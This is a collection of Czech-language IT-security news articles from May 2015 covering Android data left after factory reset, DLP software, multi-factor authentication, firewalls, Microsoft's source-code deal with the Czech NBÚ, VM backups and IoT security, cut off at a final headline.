Podpora se zabudovala do nových UTM modelů – SG 125w a SG 135w (modely SG 105w a SG 115w zůstávají u podpory 802.11n). Podle dodavatele to usnadní implementaci nového bezdrátového standardu v prostředí menších i středních firem.

Nové přístupové body značky Sophos jsou postavené na čipových sadách určených pro podnikové zákazníky a podle výrobce se pyšní speciálně navrženými anténami, vyšším výpočetním výkonem i větší pamětí než předchůdci.

Například nový přístupový bod AP 100 pro protokol 802.11ac je k dispozici za srovnatelnou cenu jako jeho předchůdci, ale nabízí třikrát vyšší výkon.

Sophos rozšířil své portfolio přístupových bodů o dva nové modely ze série AP 55 v provedení desktop/pro montáž na strop, v konfiguraci 2x2 MIMO a s dvojicí rádiových jednotek. Dále o tři nové modely ze série AP 100 určené pro podniková prostředí a splňující standard 802.11ac v konfiguraci 3x3 MIMO a s dvojicí rádiových jednotek, přístupový bod AP 100 v provedení desktop/pro montáž na zeď, přístupový bod AP 100X určený pro venkovní použití a odolný podle třídy krytí IP67 a konečně přístupový bod 100C v podobě detektoru kouře určený pro montáž na strop.

Integrované i samostatné přístupové body lze navíc spravovat přímo ze zařízení řady SG.


Data z telefonů s OS Android nemusejí být vymazána ani po obnovení továrního nastavení

25.5.2015 Hrozby
Z nové studie vyplývá, že ani po resetování telefonu s operačním systémem Android do továrního nastavení nemusejí být vždy smazána všechna citlivá dat.

Vědci z University of Cambridge vydali novou studii, v níž testovali jedenadvacet použitých telefonů zakoupených mezi lednem a květnem minulého roku na aukčním portálu eBay. Konkrétně šlo o telefony od společností Samsung, HTC, LG, Motorola a tři smartphony řady Nexus od Googlu. Na telefonech běžely různé verze Androidu - od verze 2.3.x až po 4.3.

Z výsledků studie vyplývá, že vědci byli v osmdesáti procentech případů schopni číst tzv. master tokeny Googlu, které je možné použít k opětovnému spárování zařízení s Google účtem předchozího vlastníka.

Díky tomu by potenciální útočníci mohli získat přístup k e-mailům, kontaktům, heslům na Wi-Fi a dalším informacím, které jsou na Google účtu uloženy. V některých případech se vědcům podařilo dokonce získat přístup k tokenům různých IM aplikací či Facebooku.
„Důvodů, proč resetovací mechanismus selhal, je více a nutno podotknout, že nové telefony jsou v tomto směru lepší, než ty staré. Lze také říci, že z telefonů Googlu je obecně možné po resetování získat méně dat, než z telefonů OEM,“ uvedl v příspěvku na blogu jeden z tvůrců studie Ross Anderson. „Výrobci by měli lépe odvádět svou práci a uživatelé by si měli dávat větší pozor.“

Riziko toho, že nový majitel telefonu získá přístup k datům toho starého, je možné do jisté míry eliminovat šifrováním. Jak však zjistili vědci, pomyslný útočník by byl v některých případech schopen získat dostatečné množství informací k prolomení šifrovacího klíče i po obnovení továrního nastavení telefonu. Je proto důležité, aby si uživatelé při šifrování svých telefonů nastavili silná hesla, jelikož prolomení PINu o čtyřech číslech je příliš snadné.

V závislosti na svých zjištěních vědci odhadují, že je na světě až 500 milionů zařízení, z jejichž disků nebyla správně mazána data a 630 milionů zařízení, u nichž nebyla úplně vyčištěna SD karta, tudíž na ní lze najít třeba fotografie a videa.

Vědci zkoumali také řešení známých bezpečnostních společností, která umožňují například uzamknout a vymazat zařízení na dálku. Došli však k závěru, že ani tyto aplikace nenabízejí dostatečnou alternativu, jelikož jejich funkce jsou limitovány architekturou operačního systému a dostupnými API. Se 100 % funkčním řešením tak mohou podle vědců přijít pouze výrobci telefonů.


Safetica vylepšuje ochranu proti úniku dat

25.5.2015 Software
Produkt Safetica 6, novou verzi své vlajkové lodi pro zabránění úniku citlivých dat (DLP), představila Safetica Technologies. Oproti „pětce“ nabízí varianta 6 několik zásadních, ale i menších změn vylepšujících bezpečnost, výkon, efektivitu správy produktu, a také modernější uživatelské rozhraní.

Nová verze rozšiřuje podporované prostředí o terminálové servery, jako jsou například Microsoft Terminal Services nebo Citrix XenApp. Reaguje tak na pořád větší rozšíření terminálových řešení ve firmách a Safetica se tak prý stává jedním z mála auditních a DLP produktů, které jsou s terminálovými servery kompatibilní.

Mezi další hlavní změny patří nové jádro technologie DLP. Kromě optimalizace vyhodnocení bezpečnostních pravidel rozšiřuje možnosti ochrany dat z webových zdrojů, např. intranetových stránek organizace.

Nová funkce usnadňuje řízení stažených a nahraných dat prostřednictvím webového prohlížeče a jejich provázanost s politikou organizace. Díky definování datových kategorií vůči webům také lze při jejich prohlížení ve webovém prohlížeči aplikovat příslušné bezpečnostní politiky, jako například zákazy vkládání citlivých dat do schránek, tisk nebo snímání obrazovky v případě, že se na ní vyskytují citlivá data.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Vylepšením prošly i Alerty (varování). Ty jsou nově rozděleny do 3 kategorií a obohaceny o možnost konfigurovat prahy a kategorie. Vylepšený reportovací systém tak umožňuje na míru požadavkům zákazníka automaticky upozornit na incident nebo zaznamenanou situaci bez nutnosti jakéhokoliv manuálního zpracování.

Zlepšení architektury se také dotkne větších zákazníků. Vylepšen byl proces nasazení řešení, architektura, vzdálená správa produktu a výkon serverových částí pro firmy mimo SMB a SMI segment kvůli zvýšené poptávce ze strany enterprise zákazníků.

Kromě mnoha menších změn verze Safetica 6 přináší zlepšení výkonu databáze i klienta na koncové stanici. Díky novým technologiím usnadní efektivitu instalace, konfigurace a správy řešení přibližně o 25% oproti předchozí verzi.


Vícefaktorová autentizace: Jak vypadá praxe?

22.5.2015 Zabezpečení
Vícefaktorová autentizace, která se stále častěji objevuje v souvislosti se zabezpečeným řízením přístupu, představuje poměrně širokou oblast zahrnující fyzickou i virtuální vrstvu. S rozšířením chytrých telefonů se tento způsob ověření uživatele dostává do širšího povědomí.

Takřka každý informační systém potřebuje znát identitu uživatele, který k němu přistupuje. A také musí mít přijatelnou úroveň jistoty, že přistupující uživatel je skutečně tím, za koho se vydává.

Pryč jsou doby, kdy stačilo ověření jménem a heslem. S nástupem bankovních aplikací se uživatelé mohli seznámit s certifikáty jako autentizačními nástroji. V korporátní sféře zase existuje povědomí o přihlašování pomocí hardwarových tokenů. Tyto rozličné způsoby identifikace uživatele a jejich vhodné použití řeší vícefaktorová autentizace (MFA, Multi-Factor Authentication).
Co je vícefaktorová autentizace?

Vícefaktorová autentizace je metoda ochrany přístupu k prostředku (například webu či informačnímu systému), založená na kombinaci zabezpečení ve třech oblastech (takzvaných faktory): znalost (něco, co uživatel zná nebo se mu sdělí), vlastnictví (něco, co má uživatel ve svém držení) a konečně biometrie (něco, co představuje uživatele samotného – čím uživatel sám je).

O MFA se mluví v případech, kde je třeba zajistit ověření identity přistupující k informačnímu systému více způsoby. Větší bezpečnosti se zde dosáhne diverzifikací zabezpečení – nejen co do počtu, ale i co do různých faktorů. Pokud útočník například získá přístup k něčemu, co uživatel zná (hesla uložená na počítači), není zabezpečení heslem a PIN tak bezpečné jako například heslem a hardwarovým tokenem.

Standardní situace při přihlášení pomocí vícefaktorové autentizace může vypadat takto: Uživatel zná svoje přihlašovací jméno ve specifickém tvaru (i to lze považovat za formu znalostního faktoru, byť je veřejně zjistitelné) a heslo (znalostní faktor).

Na klasických klíčích má pověšený hardwarový token (faktor v držení), který se navíc může doplnit o PIN (opět znalostní faktor).

Existují zde tedy tři informace, které musí uživatel znát, z toho dvě tajné, a jednu věc, kterou musí mít při sobě.
Autentizační faktory

Tady jsou krátké ukázky autentizačních mechanismů v jednotlivých faktorech.

Faktor „znalost“

Jde v podstatě o cokoli, na co si je uživatel schopný vzpomenout. Klasickým příkladem může být heslo a PIN (ať už ke kartě nebo k mobilnímu telefonu), ale patří sem i výběr obrázků podle vlastní preference (například software Confident ImageShield), nakreslení gesta/znaku (jako třeba odemčení Androidu, viz obrázek 2) volba přihlášení do Windows 8 či stále oblíbené osobní otázky („jméno matky za svobodna“) či osobní atributy (RČ, město narození).

Patří sem ale i vygenerované jednorázové kódy, které lze použít například jako obálkovou zálohu k jinému faktoru.

* Faktor „vlastnictví“

Tento činitel představuje zjednodušeně to, co lze nosit v kapse nebo peněžence. Zahrnuje například hardwarové tokeny (RSA SecurID, Yubikey), platební karty, mobilní telefony (aplikace využívající IMEI) a SIM karty (ověření zpětným voláním a pomocí SMS OTP, třeba Eset Secure Authentication) a v zobecněné podobě i osobní doklady (občanský, řidičský průkaz, pas).

* Faktor "biometrie"

Prvek „biometrie“ zahrnuje charakteristiky svého nositele. Snadno si lze představit otisk prstu, rozšířený jak ve sféře notebooků (podpora přihlašování například ve Windows 7, 8), tak mobilní techniky (zástupcem mohou být zařízení iPhone generace 5 a 6).

Další možností je například sken očnice, který je známý zatím spíše z akčních filmů, anebo rozpoznávání obličeje, jež využívají především uživatelé OS Android (podpora od verze 4.2 Jellybean; ve variantě 5 Lollipop se tento sken vykonává už automaticky; u jiných mobilních OS lze toho dosáhnout prostřednictvím odpovídající aplikace).

Autentizace hlasem je naproti tomu stále doménou speciálních programů (například řešení od firem Nuance, Autentify, Voxeo). A konečně speciální kategorií je pak charakteristika „jsem člověk“, která se používá například v mechanismu CAPTCHA nebo obecně tam, kde je řešení sice jednoduché, ale špatně jej lze algoritmizovat (jako třeba „klikněte na obrázek psa“).

V současnosti se diskutují i další faktory, jako jsou geolokace (kde se uživatel nachází) a čas (kdy se tam nachází), které se dají využít v boji s útoky na MFA, viz níže.
Trendy autentizačních tokenů

Co je nového ve slibně se rozvíjející oblasti tokenů, která tvoří velmi častou komponentu dvoufaktorové autentizace? Tady je to nejdůležitější.

Hardwarové tokeny

V korporátní sféře představují hardwarové tokeny převládající způsob realizace autentizačních tokenů. Klasickým představitelem je token RSA, který používá pro generování kódu časové hledisko. Novější variantou je pak například Yubikey, který slouží jako jednoúčelová klávesnice a ke generování přístupového kódu využívá sekvenční metodu.

Princip fungování hardwarových tokenů je:

Každý token je unikátně identifikovaný
Autentizační server má každý token přiřazen ke konkrétnímu uživateli
Token generuje přístupový kód podle definovaného algoritmu (na základě času či sekvenční metodou)
Server kód zaslaný uživatelem porovná na své straně s kódem, který si vygeneruje stejným algoritmem
Pokud se oba kódy shodují, uživatel se tímto faktorem ověří

Výhoda tohoto přístupu je zjevná: aby někdo zfalšoval přístup někoho jiného, musí kromě uživatelského jména a hesla získat i fyzický přístup k tokenu.

Nevýhody HW tokenů jsou především v nenulové pořizovací ceně a v potřebě fyzicky spravovat životní cyklus tokenu (vydání, obměna, skartace). V případě osamostatněných tokenů je též vyšší riziko man-in-the-middle útoku.

* Softwarové tokeny

Trendem, řešícím některé nevýhody svých hardwarových protějšků, jsou softwarové tokeny. Jde v podstatě o aplikaci spuštěnou na chytrém telefonu (s OS Android, iPhone, Windows Phone aj.). Použití je shodné. Program v telefonu se spáruje s autentizačním serverem a od té doby generuje klíče, kterým autentizační protějšek rozumí. Příkladem takových řešení mohou být Google Authenticator, Authy, Amazon AWS MFA apod.


Kam směrují firewally?

22.5.2015 Software
Firewally byly v posledních desetiletích ochráncem internetu založeným na práci s porty. Dodavatelé ale nyní už vytvářejí tzv. firewally nové generace (NGFW), které zohledňují samotné aplikace, protože dokážou sledovat a řídit přístup na základě používání aplikací.

Kromě zohlednění aplikací se do mnoha firewallů přidává stále více funkcí, které zahrnují systémy IPS (systémy prevence narušení), filtrování webových stránek, VPN, systémy DLP (prevence úniku dat), filtrování malwaru a dokonce systém detekce hrozeb pomocí tzv. karanténního prostoru pro odhalování útoků nultého dne. Pokud jde o samostatný systém IPS, i některé z nich lze už nazývat „IPS nové generace,“ -- z důvodu jeho řízení aplikací.

Dodavatelé firewallů a systémů IPS se snaží udržet náskok před ostatními při snaze o stále vyšší propustnost, aby se uspokojila potřeba rychlosti, jak virtualizovaná datová centra vyžadují stále větší šířku pásma ochranných prvků.

Výrobci touží po uznání od Gartneru nebo soupeří o vítězství s konkurencí v technických hodnoticích testech, jako jsou například testy laboratoří NSS Labs nebo Neohapsis Labs. Nakonec však jde o získání přízně kupujících. Potvrzuje to Rusty Agee, inženýr zabezpečení informací v americkém městě Charlotte, které využívá širokou řadu firewallů.

„Firewally i IPS systémy se vyvíjejí,“ uvádí Agee, „ ale pokud jde o jejich funkce a rychlost, vždy hledám něco lepšího.“

Virtualizace datového centra, zvýšené používání mobilních zařízení a vyhlídka, že zmíněné město akceptuje trend BYOD (používání vlastních zařízení pro firemní účely), jsou některé z důvodů, proč Agee zůstane otevřený novým možnostem ochrany dat. Zdejší požární a policejní okrsky začaly už ve velké míře používat tablety a smartphony a nyní zvažují možnost přechodu k BYOD, poznamenává Agee.

Zaměstnanci, kteří používají mobilní zařízení, využívají klienta Cisco AnyConnect k navázání připojení pomocí sítě VPN k městskému firewallu Cisco ASA, uvádí Agee. Spolu s dalšími firewally Cisco a samostatným zařízením Cisco IPS město využívá také firewally Check Pointu a samostatné produkty IPS k ochraně přenosů důležitých serverů, datových center, přístupu k internetu a metropolitní bezdrátové sítě.

Tím však seznam firewallů a IPS od více dodavatelů v městské síti nekončí. Město má také firewall nové generace od společnosti Palo Alto Networks pro sledování a kontrolu používání aplikací zaměstnanci.

Navíc se používá aplikační firewall F5 Networks ke sledování útočných přenosů vůči webovým serverům města. Agee uvádí, že mají centralizovanou správu protokolů pro tato bezpečnostní zařízení a využívají pro to produkt SIEM (Security Information and Event Management) od společnosti LogRhythm.

„Naše firewally nasypou do produktu LogRhythmu stovky tisíc logů denně,“ popisuje Agee a dodává, že jejich samospráva také občas dostává data týkající se bezpečnostních upozornění z celostátních bezpečnostních center.

Centralizace výsledných protokolů z firewallů a systémů IPS spolu s protokoly ze serverů tak pomáhá bezpečnostnímu personálu stanovit z jediného místa případný síťový problém, který může představovat útok nebo problém související s webem města, který by lépe zvládlo personální oddělení nebo jejich management.

Použití tak rozsáhlé kombinace firewallů různých dodavatelů v jedné organizaci je ale spíše výjimkou než pravidlem. Greg Young, analytik Gartneru, uvedl na loňské konferenci Gartner Security and Risk Management, že jejich firma registruje u většiny organizací spíše nasazení produktů od jednoho dodavatele.

Pokud jde o novou generaci firewallů, kterou mimochodem Gartner velmi doporučuje implementovat, odhaduje se, že dnes používá NGFW méně než 10 % organizací. Očekává se ale, že toto číslo během pěti let vzroste až nad hranici 30 %.

Young také poznamenal, že je zřejmé, že SSL VPN se úplně přesouvá do firewallu a podoba produktů SSL VPN formou samostatných zařízení zřejmě skončí.

Zdá se tedy, že firewally a IPS mohou existovat téměř kdekoliv. Jedním z příkladů je Fortinet Secure Wireless LAN – v podstatě bezdrátový přístupový bod a přepínač integrovaný do zařízení UTM (jednotná správa hrozeb) s funkcemi firewallu a IPS.

John Maddison, viceprezident marketingu společnosti Fortinet, uvádí, že je oblíbený zejména v obchodních řetězcích, kde je ekonomickou variantou pro získání bezdrátového pokrytí a současně zabezpečení.
 

Řetězec restaurací Jack-in-the-Box zase nedávno ve stovkách svých provozoven nasadil 650 zařízení FortiWiFi-60CS, která kombinují bezdrátový přístup s firewallem a funkcí IPS.

Jim Antoshak, jejich ředitel IT, prohlašuje, že starší bezdrátové body v restauracích mohou už bez obav vyřadit a že zařízení Fortinet jim dává přínosnou kompaktní kombinaci technologií bezdrátových sítí a zabezpečení.

Argument?

Jedna z diskuzí se ale točí kolem dvou hlavních otázek: Je víceúčelové zařízení kombinující firewall a IPS stejně účinné jako samostatná řešení? A co modul zabezpečení v přepínači nebo směrovači?

Společnost HP, podobně jako Cisco nebo Juniper, nabízí bezpečnostní moduly s funkcí firewallu a IPS, které mohou pracovat v jejích přepínačích a směrovačích.

Rob Greer, viceprezident a generální ředitel produktů podnikového zabezpečení v divizi HP TippingPoint, však tvrdí, že pokud jde o systémy IPS, vidí HP hlavní nasazení v podobě vyhrazených, samostatných zařízení.

Poznamenává, že pro příští generaci systémů IPS, zohledňujících aplikace, to HP obecně považuje z hlediska výkonu a podrobného nastavení za nejlepší přístup.

Mike Nielsen, hlavní ředitel pro zabezpečení sítě a marketing produktů ve společnosti Cisco, zase prohlašuje, že drtivá většina jejich produktů z oblasti firewallů a IPS jsou „vyhrazená bezpečnostní zařízení“.

Například produkt ASA 5585-X Series v její řadě produktů Adaptive Security Appliance má propustnost firewallu o hodnotě 40 Gb/s. Nielsen uvádí, že v režimu IPS tato hodnota činí až 80 Gb/s při současném využívání funkce zohledňující řízení aplikací.

To je podle něj hlavní prvek, který umožňuje používat pro takový produkt název „firewall příští generace“ podle definice Gartneru.

Jason Brvenik, viceprezident strategie zabezpečení ve skupině technologického výzkumu společnosti Sourcefire, kterou nedávno koupilo Cisco, tvrdí, že „specializovaná zařízení přinášejí svobodu, abyste mohli reagovat na nejnovější vývoj hrozeb“.

Fred Kost, ředitel produktového marketingu společnosti Check Point, zase uvádí, že zákazníci vyžadující vysokou propustnost a nízkou latenci obvykle volí vyhrazená provedení. Poukazuje však na to, že zákazníkům z malých až středně velkých firem často stačí víceúčelové brány firewall a zařízení UTM (jednotná správa hrozeb).


Microsoft předal NBÚ zdrojové kódy svých klíčových programů

22.5.2015 Bezpečnost
Smlouvu o vládním bezpečnostním programu (Government Security Program - GSP) podepsaly Microsoft a Národní bezpečnostní úřad (NBÚ). V jejím rámci poskytne Microsoft NBÚ a jeho organizačním složkám přístup ke zdrojovému kódu a dokumentaci svého softwaru.

Smlouvu za Českou republiku podepsal NBÚ jakožto gestor problematiky kybernetické bezpečnosti a zároveň národní autorita pro oblast kybernetické bezpečnosti. Dohoda umožňuje čtyři oblasti přístupu k poskytovaným informacím:

Autorizace „Online přístup ke zdrojovému kódu“. Tento modul dává Národnímu centru kybernetické bezpečnosti (NCKB, organizační složka NBÚ) a dalším určeným orgánům státní správy přístup ke zdrojovému kódu formou zabezpečeného dálkového přístupu, a to v interaktivním čtecím režimu. Cílem je hodnocení bezpečnosti a integrity kódu Microsoft Windows, Office a dalších běžně používaných softwarových produktů. Dále umožňuje analýzu a vývoj vlastních zabezpečovacích nástrojů vč. využití národní šifry v prostředí Microsoft Windows.

Autorizace „Transparentní centrum“. Tento modul poskytuje NCKB prostředky Transparentního centraMicrosoftu, které je v rámci Evropy umístěno v Bruselu. Dosud tuto možnost NCKB nemělo. Oproti přístupu ke zdrojovému kódu umožňuje přístup do Transparentního centra také hlubší rozbory a strojové (automatizované) testování softwarových produktů společnosti Microsoft včetně jejich dokumentace. Cílem je prověření kvality zdrojového kódu produktů Microsoftu vč. kontroly proti tzv. „zadním vrátkům“.

Autorizace „Technické údaje“. Účelem tohoto modulu je sdílení technických údajů o produktech, službách a technologiích Microsoftu. Jde např. o plné hodnocení softwarových produktů pro certifikaci Common Criteria, dále přístup k dokumentaci ISO 27001 cloudových služeb, či přístup k auditním zprávám bezpečnosti a soukromí cloudových služeb.

Autorizace „Sdílení a výměna informací“. Tento modul umožňuje NCKB přijímat v reálném čase informace o možných infekcích počítačů v teritoriu České republiky. NCKB dle původní smlouvy o „Botnet feeds“ z roku 2013 již zhruba 18 měsíců dostává a využívá data společnosti Microsoft o možných infekcích počítačů v ČR. NCKB tyto informace zpracovává a dále předává či ověřuje s národním CERT (CSIRT.CZ), nebo je v případě ohrožení orgánů veřejné moci ČR přímo předává dotyčným organizacím. Dále tento modul umožňuje NCKB předávat hlášení o nových hrozbách, dotazy na možné zranitelnosti v softwarových produktech Microsoftu a obecně dotazy a žádosti o analýzu škodlivého kódu.


Zvládněte zálohy virtuálních strojů

22.5.2015 Bezpečnost
V předvirtualizační době se zálohování stavělo na tom, že bylo nutné data ve formě souborů či databází ukládat na nějaká zálohovací média. Bez ohledu na ukládací médium se každé zálohování setkávalo s problémem velkého objemu dat, zálohovací okno bylo většinou v noci a zálohovanému počítači se výrazně snižoval výkon. V případě virtuálních strojů se ovšem tyto problémy ještě násobí v podobě dalšího nárůstu množství zálohovaných dat.

Jak tedy zajistit, aby se servery nenamáhaly, zálohování bylo spolehlivé a náklady akceptovatelné?

Hlavní problém zálohování spočívá v tom, že je potřeba udržovat zálohy v čase, často alespoň 30 dní dozadu. Každodenními zálohami pak velmi rychle narůstá jejich objem.

Dosavadním běžným řešením jsou tzv. rozdílové zálohy, kdy se jednou za týden (např. o víkendu) udělají plné zálohy a pak se každý další den zálohují pouze ty soubory, které se změnily.

Obnova dat z požadovaného dne pak probíhá tak, že se rekonstruuje plná záloha plus rozdílové zálohy z dalších navazujících dnů.

Avšak v případě zálohování virtuálních strojů přichází jedno velké „ALE“. Disky virtualizovaných strojů vytvářejí z celého virtuálního počítače jeden velký soubor o velikosti desítek či stovek gigabytů, takže když existují například na jednom hardwaru čtyři virtuální stroje, často se uloží v pouhých čtyřech extrémně velkých souborech.

Z toho vyplývá, že se tyto soubory sice velmi snadno zálohují, avšak špatnou zprávou je, že pokud se přírůstková záloha aplikuje na změněné soubory, pak se tato ve své podstatě rovná záloze plné – soubor se změní vždy ihned po udělání zálohy.

A v případě, že bychom se mělo zálohovat 30 dní zpátky, tak například u virtualizovaných strojů v běžné středně velké firmě soubor o velikosti 500 GB znamená mít úložiště 15 TB, což je fyzicky i finančně neúnosné.

Proto je potřeba mít nástroj, který dokáže poznat, které části souboru se změnily a přírůstkově zálohovat pouze je a nikoliv celé obrovské soubory. Pokud je změna pouze například desetiprocentní, pak se měsíční zálohy vejdou třeba do 1,5 TB, což už je celkem zvládnutelné.

Jak na zálohy

Jaké dnes mají podniky možnosti? Tradičně se naskýtá Windows Backup, který dokáže zálohovat všechno, ale neumožňuje rozdílové zálohy na síťový disk a ani nastavit individuální plán záloh.

Pak lze použít zálohovací nástroje „ze staré školy“, které ale nebyly primárně vytvořeny pro zálohování virtuálních strojů a způsob jejich licencování do značné míry eliminuje úspory, kvůli kterým podniky využívají virtualizaci.

A nebo se zákazníci mohou obrátit na specializované zálohovací aplikace určené pro virtualizované prostředí, jehož představitelem je například Altaro Hyper-V Backup.

Jakmile ale firmy zjistí, že vestavěné zálohování ve Windows jejich požadavkům přestává stačit, či standardní zálohovací nástroje prakticky eliminují finanční výhody virtualizace, je třeba ohlédnout se po specializovaném řešení, které by mělo:

• být snadno použitelné a vysoce spolehlivé v oblasti zálohování virtuálních strojů

• podporovat off-site ukládání záloh

• poskytovat velmi rychlou obnovu včetně možnosti nabootovat virtuální stroj přímo ze zálohy

• možnost obnovit jednotlivé položky z Exchange, či jednotlivé soubory z virtuálního stroje

• pravidelně testovat obnovu
 

• šetřit úložný prostor a zkracovat zálohovací okna díky rozdílovým zálohám

Obnova souborů a ReverseDelta

Pokud se podíváme na jednotlivé body podrobněji (bez nároku na pořadí), tak zjistíme, že specializovaný software umožňuje plánovat oddělené zálohy více a méně důležitých dat, umí nezávisle na virtuálním stroji plánovat retence dat (týden, měsíc dozadu apod.) podle potřeby a umí rozdílové zálohy na úrovni bloku souborů.

Navíc, umožňuje obnovit i jednotlivé soubory (to není samozřejmostí, uvědomme si, že se zálohují celé virtuální stroje) včetně jednotlivých e-mailů.

A to je velmi důležité, protože nejčastějším důvodem obnovy není katastrofické zničení systému, jak si mnozí myslí, ale obnovení konkrétního, omylem smazaného soboru ze zálohy.

Druhým nejčastějším důvodem je obnova databáze, třetím je v případě selhání systému obnova posledního funkčního stavu a teprve až na čtvrtém místě je kompletní obnova celého hardwaru několik dní či týdnů zpátky.

Proto například drží specializovaný software plnou zálohu vždy tu poslední a rozdílové zálohování probíhá zpětně (tzv. ReverseDelta), protože takto poskytuje nejrychlejší obnovu.

Offsite zálohy a bootování ze zálohy

Většina starších zálohovacích systémů umí zálohovat na dvě hlavní média – pásky a disková úložiště. Nové moderní systémy naopak podporu pro pásky už vůbec nezavádějí a rovnou zálohují do souborů na disku.

Hlavním důvodem je poměrně složitá manipulace s páskami a vysoké náklady na takové řešení pro SMB společnosti. Výhodou pevných disků je vyšší rychlost ukládání, nicméně na druhou stranu existuje vyšší riziko v tom, že tyto disky jsou většinou umístěné ve stejné lokalitě jako virtuální stroje.

Je tedy dobré přemýšlet o umístění mimo lokalitu – pásky je sice možné fyzicky přenést někam jinam, ale takto přenášet disky je poměrně nepraktické. Proto se často dělá tzv. offsite záloha: Již zálohovaná data se přenášejí do jiné lokality, nejčastěji po internetu.

Pokud jsou v záloze celé virtuální disky, pak je velmi užitečná možnost nabootovat server přímo ze záložního média, což velmi urychluje obnovu systému.

A konečně -- kromě pravidelného zálohování virtuálních strojů se vždy doporučuje tyto zálohy testovat na funkčnost, což samozřejmě neznamená jen kontrolu obsahu zálohy, ale čas od času udělat obnovu a ověřit si schopnost nastartovat zálohovaný virtuální stroj.

Většina administrátorů to ale sama od sebe nedělá, a proto moderní systémy umožňují realizovat testovací obnovy automatizovaně -- například jednou týdně vytvoří klon serveru, zkusí ho nastartovat, a pokud se to nepovede, tak se vygeneruje automatizované chybové hlášení.

Virtualizace přinesla do oblasti zálohování nové výzvy a pro řadu SMB podniků možná i těžko řešitelné situace. Dobrou zprávou je, že dnes již i pro tyto společnosti existují specializované nástroje umožňující efektivní a cenově dostupné zálohování virtuálních počítačů.


Odlehčená bezpečnost internetu věcí

22.5.2015 Bezpečnost
Rozmach „internetu věcí“ (Internet of Things, IoT) před nás postaví zcela nové bezpečnostní výzvy.

Gartner tvrdí, že v roce 2020 bude k internetu připojeno 30 miliard zařízení. Cisco dokonce uvádí skoro dvakrát tolik – 50 miliard. A Morgan Stanley jde přitom ještě výš -- zařízení prý bude 75 miliard. Kdo z nich bude blíže realitě, ukáže až čas.

Pokud se podíváme na různé žebříčky typu „X technologií, které v nejbližších Y letech změní náš svět“, nikdy tam právě IoT nechybí. Jde o svět, kdy budeme komunikovat přímo s jednotlivými zařízeními a kdy tato budou komunikovat navzájem (M2M, Machine To Machine).

Hacknutý záchod

Loni se objevila informace, že díky bezpečnostní chybě lze luxusní chytrý záchod společnosti Satis ovládat jakýmkoliv mobilem na dálku skrze Bluetooth. Lze tak zvedat či spouštět prkénko, splachovat nebo zvyšovat či snižovat teplotu vzduchu určeného k usušení.

Zpráva působí úsměvně a vyvolává otázku, jakouže asi má tato informace hodnotu pro hackery. Staré a prověřené bezpečností poučky nám ovšem říkají, že „nemusíme chápat celý rozsah problému, oni útočníci už něco vymyslí“ a že „každý zranitelný bod se může stát odrazovým můstkem k útoku na další místa“.

Napadení chytrých televizorů Samsung a ovládnutí disku, možnost přepínání kanálů, změny nastavení, instalace malwaru nebo dokonce ovládnutí instalované webové kamery (jak se o chybě informovalo v prosinci 2012) je z hlediska názornosti přece jen jasnější.

Symantec zase loni upozornil na linuxového červa Darlloz, který se zaměřuje na starší (leč často neopravenou) chybu v php. Speciálně se přitom zaměřoval na IoT: bezpečnostní kamery, set-top boxy, chytré měřiče...

V závěru loňského roku pak společnost Proofpoint detekovala tisíce infikovaných chytrých zařízení, která byla připojená do sítě zajišťující rozesílání spamu. Šlo o multimediální centra, televizory, domácí směrovače a dokonce i o jednu ledničku!

Ovšem nejen útoky ve smyslu, v jakém se nejčastěji vnímají (malware, rozesílání spamu, krádež dat...), představují v IoT nebezpečí. Potenciální útočník si totiž data může „vyrobit“. Stačí mu zjistit, kolikrát otevřete mikrovlnku, ledničku nebo zda vůbec zapnete televizní přijímač – a má odpověď na otázku, jestli jste vůbec doma. Těžko dnes předvídat, zda tyto okruhy nakonec budeme řešit, nebo se s nimi prostě smíříme.

Další směry vývoje napoví třeba nedávné patentování technologií, které dokážou s pomocí chytrých televizorů určit počet osob v místnosti, jejich velikost (dítě vs. dospělý) a třeba i vzájemnou polohu.

Následně jim promítá reklamy „šité na míru“: Něco jiného tak v komerční přestávce uvidí dvojice zamilovaná sedící blízko sebe ruku v ruce, něco jiného pak matka za žehlícím prknem.

Obecně obecně se ale dá říci, že na nás v IoT čekají zcela nové hrozby, které dnes ani nedokážeme kvantifikovat.
Jak na to?

Na pořadu dne tak nebude otázka, zda to je bezpečné. Spíše se budeme ptát, jak IoT řádně zabezpečit.

„Žádné samostatné řešení nedokáže plně ochránit zařízení před útočníky, kteří využijí několika odlišných vektorů,“ uvádí Steve Hoffenberg z M2M Embedded Software & Tools.

V tom má bezpochyby pravdu a lze jen dodat, že nejspíše nikdy nebudeme schopni zajistit takovou míru bezpečnosti na všech frontách, jakou bychom si představovali.

Hoffenberg jedním dechem sice dodává, že pro maximalizaci bezpečnosti bude třeba zařízení vybavit technologií detekce malwaru, whitelisty i blacklisty, kontrolou přístupu, šifrováním dat, autentizací uživatele či analýzou hrozeb v reálném čase.

Což je sice také pravda, ale jde především o technický pohled na věc: dokážete si byť jen část těchto systémů představit v inteligentním měřiči spotřeby tepla, rotopedu nebo v zubním kartáčku?

Technologie zabezpečení tak bude zřejmě ležet jinde: Indický výzkumník Shahid Raza ze švédského institutu SICS, který se o IoT dlouhodobě věnuje, používá poměrně trefný termín Lightweight Security (odlehčená bezpečnost).

Řeší tři základní oblasti. Jednak bezpečnou komunikaci, kterou navrhuje ošetřit skrze komprimované (byť stále bezpečné) protokoly IPSec (síťový), DTLS (Datagram Transport Layer Security; transportní) a IEEE 802.15.4 (linkový).

A také pomocí detekce útoků pomocí zcela nové koncepce IDS a firewallů (Raza dokonce vytvořil nástroj, který nazval SVELTE). A konečně zajistit ochranu dat uvnitř uzavřených uzlů.

„Odlehčení“ přitom spočívá jak ve vytvoření nových algoritmů, tak v orientaci se jen na určité skupiny rizik. To znamená, že aplikace by nebyly všeřešící, ale spíše než zajišťovat bezpečnost by ji měly zvyšovat. Raza podotýká, že platformy musí zůstat dostatečně otevřené, aby byly schopné reagovat na aktuální vývoj.

Dále dodává, že jde především o modely a že bude třeba vytvořit nové standardy -- jak technické, tak organizační. Stejně jako v dnešním světě bude i v IoT zapotřebí reagovat na nové objevované hrozby – třeba i v podobě zranitelností.

Pravdou se ale asi stane to, že budeme muset přehodnotit naše vnímání toho, co je ještě bezpečné a co už ne - a tomu přizpůsobit naše požadavky.

Ať tak či onak, velká příležitost IoT zkrátka přinese i velkou zodpovědnost. Jinak se realitou stane tvrzení některých zlých jazyků, kteří nehovoří o IoT, ale o IoHT – Internet of Hackable Things.


Hackeři se snaží černou práci přenést na samotné oběti

